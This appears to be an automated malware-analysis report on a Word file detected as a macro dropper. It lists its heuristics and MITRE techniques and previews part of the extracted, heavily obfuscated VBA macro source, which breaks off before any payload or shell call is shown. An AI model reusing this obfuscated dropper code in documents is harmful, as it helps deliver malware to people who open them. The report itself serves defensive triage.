MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The 'Shell()' call within the VBA code indicates an attempt to execute an external process. ClamAV detection and heuristic firings confirm its malicious nature as a dropper. The embedded URL is suspicious and likely points to a malicious payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6381465-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6381465-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://khj+khjlAQ+l6wG3OtKNqszm In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 223926 bytes |
SHA-256: c40353b375d36f587f085648f8da0c367b6961f5c57b53c0bcea26350dc6272a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 72 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mTiKaTRwK"
Function qNUrQOVht()
BvzViik = "qFaMXfImUtdIw57tL4PvWGlXnVqXfYzRbdYwYZZmVwMwDMDiROiAfbWikvZFcAYzirpw9kP"
iaFPsBzSNdN = Array("iMZwutcJ", "RhmOTjYU", "ZVphcoqU", "lQWjEQcJ", "NtOpjVXl", "QfCiJuAc", "miHWhKEt", "WEMiWwFA")
nsZNwkkOdL = Mid(BvzViik, 19, 33)
TiZWtuKE = Array("OlkZairT", "zpTqsfYT", "NPATUtca", "atnTaSHG", "QukfrDwT", "jFawCFTS", "ispTQvJU", "JKzhrXsj")
QLuhsbTtwNE = "McE1DmLjkOQvPMnlwjTIZGOnjuSMRddtItWPGYhBjwhQOHVfqVRiqvqowruTuKAzGZwZbczbiQ0zm"
HFVURYEiHI = Array("CFzMLNzn", "SUPIsGzc", "NbClfdAw", "wjPJCmOR", "VbJqkEsd", "FwsItPLZ", "bulXDQnZ", "EAQbznlj")
dsZOYtJ = Mid(QLuhsbTtwNE, 9, 52)
qjVcf = Array("qzWjdiwq", "iqjGhwJi", "MEimfmRv", "LifsoPoi", "HUnvkZlO", "XXuLvjRD", "qDjLdIYD", "faXwzFBS")
WdMjuMG = "MbY2A7dXK6 9Scd5qZvoqRMURbEBFMNQGJkOUmazrPJicCjwRjmzjzAiGnibpNdVlaVCfqoTwwzaIhrOsIjYaQjJJBHjEzKilnsChjRbsSwnAZaYvTjjdFuVuLsdiHPzlSpUpphLqHjHStIjbjkkPiAjsXHVnntkDwBhkFjGmXpWYnDADJCwXikHRIbRhzjT"
abJjfJjM = Array("WLPizzCj", "ACXkdYIY", "aJkZwvXs", "MPVrWWla", "RvSNsiDM", "qmzTtXtb", "hUbqWkCa", "oWWidLJd")
VmjqIpHrjFW = Mid(WdMjuMG, 18, 172)
SZsjItFw = Array("tNXZoKDc", "NQEXCiVj", "vYnELXNh", "jnKwSOut", "IUlWhPYl", "jbuoZHMB", "LsSzVQHW", "AptBzGKw")
KdjXfUAb = "1w0mQpu04BOkiljIrcmztjALLWviKoMBaRHzKuswMcDUIZdRXvdCzJXuSjjLqYsoDMKQdlwwjokRffDlsiHOLKEQuNfaOhPzGNzGFko"
BErScCzY = Array("HhXLwhpJ", "HdfGnzYV", "VQJjDjTj", "XRWwRLVc", "MsWOuzoZ", "ztYijVDc", "pRzjJIPY", "NrnjLtrw")
XdcPfnXYZZP = Mid(KdjXfUAb, 11, 84)
TjMzjoDpS = Array("pEhaCClK", "YXMPLGfA", "MpwbIwdT", "njDRVFQf", "szIzKDhV", "vBLivSKm", "HpCjLMcq", "bOmVzTpS")
pGjlfIwbjiZ = "60nczj4R4pZjI4hjYqwuwnWrdczSnvoBPEjinLEGwfudvDSXJsHYMKJqAJhkOkPUwzNsoEoPwjwCttwaKbIunQp61AA1YohI"
lkkGjvIw = Array("BpPqoccE", "JqQaZFZo", "OAWwcqIi", "IirvpKrT", "wzLtnADl", "RoZUTEzC", "aBrdTSzL", "jjhKljPw")
wPOphrkr = Mid(pGjlfIwbjiZ, 22, 66)
DNMrbsNqr = Array("VbJiLWbF", "uZJiiscY", "kZMaowSJ", "rFskqVYT", "SnDzvfQV", "KNWNjCqs", "OttiLkfZ", "IAqGdqPZ")
iTZhMTTobNr = "067U2YNQA3EvsidiTsMQZjvpZiEEsbfOGzHMGZmbVhjKIzvaKlcokmTMAkktEpvpJqovWQXtFkvsAljcmfN8DZ2aYjQE1bTRK5p80F8U"
iYMpG = Array("AhHEVzwC", "vOnmkqIE", "izdNcbza", "kNYiIoKF", "QCjGizID", "njDsTEwi", "IrGSSvmY", "ihUHbRuH")
ozpiMmhiiQw = Mid(iTZhMTTobNr, 11, 71)
kFXNQ = Array("luOqTrcG", "fbnphSsr", "GUooMCZz", "uibjzPaF", "hcwtvDYa", "BZRjoqEd", "DjmzGGrj", "URvkPvJP")
XUiSn = "FwQYDDiCfDuhYqXBMMqToHpkPvrlNjwcPZRlIhWiWnElknAHQTUESQRqGfIHLtowERSwZmsiqHwBDDzcvkUuOuKwHaidYOXczIhTUBhdapOKTQnDfjMaYtiKHTrzHPGbjUCvWjHtAYWtmEz1h1SQbvS"
bszNIVzjXw = Array("msbazhfl", "oXAOksbC", "jpfApvIW", "JvmzUUXb", "tRuqsUDU", "RAsVHRQm", "RCEqkAEr", "kFQBuhQT")
sUzFJlpnzmC = Mid(XUiSn, 2, 135)
cciTFBa = Array("wEDbSWzw", "VPuFPtzV", "KwbrIvZL", "WiqhzbcB", "dpwRqYID", "ruLhjUuB", "CzmhsHfB", "isEojPAu")
nlGQwJRiwaP = "Zw1ZNQu6XnnLXDOwDTrbzVziwsoiHFTHSiluMZOuPbdRYazmHcmPJD9W"
QwfadKRaAzf = Array("wFuFcKmB", "imBouhNr", "KjWjMjuz", "RiArEQdE", "CSCSjmpp", "WfqniQMj", "FQEwCFER", "LvntJuzO")
KiNEAbQ = Mid(nlGQwJRiwaP, 12, 39)
brjITjwshFC = Array("lzEdRjuj", "LAaZbQcz", "NJwfiiil", "VCAVstBU", "iWoRKLfJ", "dqjBXirR", "zIhVafEG", "QSHPfZoR")
jfwNmhdqcci = "diH6Hjmkjp6j3Ju31CVrzcZwtkAnXnrRamVfQGljksTXJqPTkwsfGmnZZMcmplzVOETt"
NtukQA = Array("HrYbLzTu", "YYulInsC", "HVFwbjfr", "bGmvbGmj", "ViYnwUEj", "EpNkUqEf", "jjPfbRZY", "MhzFNXTS")
fNCNcwn = Mid(jfwNmhdqcci, 20, 46)
pjsusUh = Array("BmzNbnWm", "McffffFq", "JCMLXnSX", "aDlpVLVn", "GDUFXOdn", "QlfffXwP", "jXjmIObN", "TcmXBhQB")
kbZJEIY = "zd4zEPBjqzfrEVjjJbJjztfrTnBWwatsSTjiFwLYsiGYsBWiVjwqVEvTtWbcZHTzhHUotEiMQkoRmHzRQWAOcCXNXPliViwlOJrlhilRFlakQijlXKMCGEUijHQdTvrhmDCdQ4ijTJrnJjqFRaT"
PdniAs = Array("jUEwuWuV", "oMDTzsjG", "fGirjhNw", "YXRCVsoF", "BcwtIrGI", "OwiSJDmz", "ozzAOjEw", "HHXXEszw")
ZEIkaRMw = Mid(kbZJEIY, 15, 119)
KwJo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.